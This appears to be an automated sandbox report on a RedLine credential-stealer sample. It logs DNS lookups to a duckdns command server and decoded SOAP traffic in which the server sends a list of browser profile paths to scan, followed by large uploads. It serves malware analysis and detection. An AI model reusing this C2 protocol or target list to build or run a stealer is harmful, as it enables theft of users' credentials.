                                                          Nov 30, 2022 00:08:13.080667973 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.083374023 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.084194899 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.085100889 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.089322090 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.090193033 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.095987082 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.096184969 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.096548080 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.096676111 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.096676111 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.096776009 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.098565102 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.098602057 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.098613024 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.098624945 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.098638058 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.098653078 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.098668098 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.099039078 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.099143028 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.099216938 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.099268913 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.099268913 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.102237940 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.102288961 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.102416039 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.102452993 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.105859041 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.105974913 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.106812000 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.106950045 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.106997967 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.107060909 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.107129097 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.107129097 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.107172966 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.107217073 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.107264996 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.107317924 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.107332945 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.107388020 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.108633995 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.108655930 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.108684063 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.108728886 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.108840942 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.108840942 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.127501011 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.127557039 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.127666950 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.127743959 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.127912045 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.127999067 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.128354073 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.128390074 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.128477097 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.128477097 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.128528118 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.128595114 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.128645897 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.128667116 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.128669977 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.128765106 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.128978968 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.128999949 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.129053116 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.129087925 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.129189014 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.129304886 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.129324913 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.129373074 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.130346060 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.130805969 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.130846024 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.130903006 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.131494999 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.131522894 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.131598949 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.131619930 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.132276058 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.132301092 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.132340908 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.132901907 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.133491993 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.133510113 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.133719921 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.133738995 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.134267092 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.134516001 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.134947062 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.134974003 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.138415098 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.138432026 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.138539076 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.138551950 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.138672113 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.138684034 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.139163971 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.139178038 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.139198065 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.139210939 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.157210112 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.157260895 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.157280922 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.157676935 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.157699108 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.157715082 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.157893896 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.158545971 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.158567905 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.158695936 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.158727884 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.158750057 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.159328938 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.159351110 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.159921885 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.159941912 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.160782099 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.187941074 CET465394968885.208.136.178192.168.2.3
                                                          Nov 30, 2022 00:08:13.318850040 CET4968846539192.168.2.385.208.136.178
                                                          Nov 30, 2022 00:08:13.501327038 CET4968846539192.168.2.385.208.136.178
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 30, 2022 00:07:25.575783014 CET6372253192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:07:25.687061071 CET53637228.8.8.8192.168.2.3
                                                          Nov 30, 2022 00:07:35.732409954 CET6552253192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:07:35.763092995 CET5986953192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:08:07.898642063 CET5439753192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:08:08.008116007 CET53543978.8.8.8192.168.2.3
                                                          Nov 30, 2022 00:08:10.978208065 CET5932453192.168.2.38.8.8.8
                                                          Nov 30, 2022 00:08:11.086960077 CET53593248.8.8.8192.168.2.3
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 30, 2022 00:07:25.575783014 CET192.168.2.38.8.8.80x9fd4Standard query (0)saleshor12.duckdns.orgA (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:07:35.732409954 CET192.168.2.38.8.8.80x7e82Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:07:35.763092995 CET192.168.2.38.8.8.80x48a3Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:08:07.898642063 CET192.168.2.38.8.8.80xe5feStandard query (0)saleshor12.duckdns.orgA (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:08:10.978208065 CET192.168.2.38.8.8.80x3609Standard query (0)saleshor12.duckdns.orgA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 30, 2022 00:07:25.687061071 CET8.8.8.8192.168.2.30x9fd4No error (0)saleshor12.duckdns.org85.208.136.178A (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:07:35.754019976 CET8.8.8.8192.168.2.30x7e82No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                          Nov 30, 2022 00:07:35.783816099 CET8.8.8.8192.168.2.30x48a3No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                          Nov 30, 2022 00:08:08.008116007 CET8.8.8.8192.168.2.30xe5feNo error (0)saleshor12.duckdns.org85.208.136.178A (IP address)IN (0x0001)false
                                                          Nov 30, 2022 00:08:11.086960077 CET8.8.8.8192.168.2.30x3609No error (0)saleshor12.duckdns.org85.208.136.178A (IP address)IN (0x0001)false
                                                          • saleshor12.duckdns.org:46539
                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          0192.168.2.34968585.208.136.17846539C:\Users\user\Desktop\workalone.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Nov 30, 2022 00:07:26.016802073 CET102OUTPOST / HTTP/1.1
                                                          Content-Type: text/xml; charset=utf-8
                                                          SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                                                          Host: saleshor12.duckdns.org:46539
                                                          Content-Length: 137
                                                          Expect: 100-continue
                                                          Accept-Encoding: gzip, deflate
                                                          Connection: Keep-Alive
                                                          Nov 30, 2022 00:07:26.213782072 CET102INHTTP/1.1 100 Continue
                                                          Nov 30, 2022 00:07:26.380656004 CET103INHTTP/1.1 200 OK
                                                          Content-Length: 212
                                                          Content-Type: text/xml; charset=utf-8
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 29 Nov 2022 23:07:26 GMT
                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                                                          Nov 30, 2022 00:07:34.937004089 CET103OUTPOST / HTTP/1.1
                                                          Content-Type: text/xml; charset=utf-8
                                                          SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                                                          Host: saleshor12.duckdns.org:46539
                                                          Content-Length: 144
                                                          Expect: 100-continue
                                                          Accept-Encoding: gzip, deflate
                                                          Nov 30, 2022 00:07:34.972991943 CET103INHTTP/1.1 100 Continue
                                                          Nov 30, 2022 00:07:35.055725098 CET104INHTTP/1.1 200 OK
                                                          Content-Length: 4744
                                                          Content-Type: text/xml; charset=utf-8
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 29 Nov 2022 23:07:34 GMT
                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 4f 62 6a 65 63 74 34 3e 74 72 75 65 3c 2f 61 3a 4f 62 6a 65 63 74 34 3e 3c 61 3a 4f 62 6a 65 63 74 36 3e 66 61 6c 73 65 3c 2f 61 3a 4f 62 6a 65 63 74 36 3e 3c 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 74 72 75 65 3c 2f 61 3a 53 63 61 6e 42 72 6f 77 73 65 72 73 3e 3c 61 3a 53 63 61 6e 43 68 72 6f 6d 65 42 72 6f 77 73 65 72 73 50 61 74 68 73 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 42 61 74 74 6c 65 2e 6e 65 74 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 43 68 72 6f 6d 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 47 6f 6f 67 6c 65 28 78 38 36 29 5c 43 68 72 6f 6d 65 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 52 6f 61 6d 69 6e 67 5c 4f 70 65 72 61 20 53 6f 66 74 77 61 72 65 5c 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 4d 61 70 6c 65 53 74 75 64 69 6f 5c 43 68 72 6f 6d 65 50 6c 75 73 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 49 72 69 64 69 75 6d 5c 55 73 65 72 20 44 61 74 61 3c 2f 62 3a 73 74 72 69 6e 67 3e 3c 62 3a 73 74 72 69 6e 67 3e 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 37 53 74 61 72 5c 37 53 74 61 72 5c 55 73 65 72 20 44 61 74 61
                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Iridium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\7Star\7Star\User Data


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          1192.168.2.34968785.208.136.17846539C:\Users\user\Desktop\workalone.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Nov 30, 2022 00:08:08.051173925 CET116OUTPOST / HTTP/1.1
                                                          Content-Type: text/xml; charset=utf-8
                                                          SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                                                          Host: saleshor12.duckdns.org:46539
                                                          Content-Length: 1144458
                                                          Expect: 100-continue
                                                          Accept-Encoding: gzip, deflate
                                                          Nov 30, 2022 00:08:08.179694891 CET116INHTTP/1.1 100 Continue
                                                          Nov 30, 2022 00:08:10.213998079 CET1244INHTTP/1.1 200 OK
                                                          Content-Length: 147
                                                          Content-Type: text/xml; charset=utf-8
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 29 Nov 2022 23:08:09 GMT
                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.34968885.208.136.17846539C:\Users\user\Desktop\workalone.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Nov 30, 2022 00:08:11.122320890 CET1245OUTPOST / HTTP/1.1
                                                          Content-Type: text/xml; charset=utf-8
                                                          SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                                                          Host: saleshor12.duckdns.org:46539
                                                          Content-Length: 1144450
                                                          Expect: 100-continue
                                                          Accept-Encoding: gzip, deflate
                                                          Connection: Keep-Alive
                                                          Nov 30, 2022 00:08:11.187195063 CET1245INHTTP/1.1 100 Continue
                                                          Nov 30, 2022 00:08:13.187941074 CET2375INHTTP/1.1 200 OK
                                                          Content-Length: 261
                                                          Content-Type: text/xml; charset=utf-8
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 29 Nov 2022 23:08:12 GMT
                                                          Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                                          Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                                                          Click to jump to process

                                                          Click to jump to process

                                                          Click to dive into process behavior distribution

                                                          Click to jump to process

                                                          Target ID:0
                                                          Start time:00:06:58
                                                          Start date:30/11/2022
                                                          Path:C:\Users\user\Desktop\workalone.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\workalone.exe
                                                          Imagebase:0x590000
                                                          File size:348672 bytes
                                                          MD5 hash:68F42F485ECE93306BEF1E4084D3052E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.270249352.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:low

                                                          Target ID:1
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Users\user\Desktop\workalone.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\workalone.exe
                                                          Imagebase:0xd20000
                                                          File size:348672 bytes
                                                          MD5 hash:68F42F485ECE93306BEF1E4084D3052E
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000000.262815044.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.406713080.000000000309F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Target ID:2
                                                          Start time:00:07:06
                                                          Start date:30/11/2022
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff745070000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
